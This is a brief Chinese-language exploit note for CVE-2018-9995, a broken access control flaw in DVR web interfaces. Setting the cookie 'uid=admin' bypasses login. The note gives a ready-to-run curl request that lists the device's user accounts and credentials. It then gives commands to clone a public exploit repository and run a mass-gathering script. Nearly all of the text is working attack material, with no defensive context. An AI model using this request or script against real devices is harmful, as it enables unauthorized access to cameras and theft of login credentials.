類別:訪問控制失效。訪問DVR系列產品的WEB端時,設置以下cookie:uid=admin
可繞過訪問控制,獲取設備內的用戶名及登錄憑證。python
curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
git clone https://github.com/exexute/Exp.git cd Exp/cve-2018-9995/ pip3 install -r requirements.txt python3 gather_cve2018_9995.py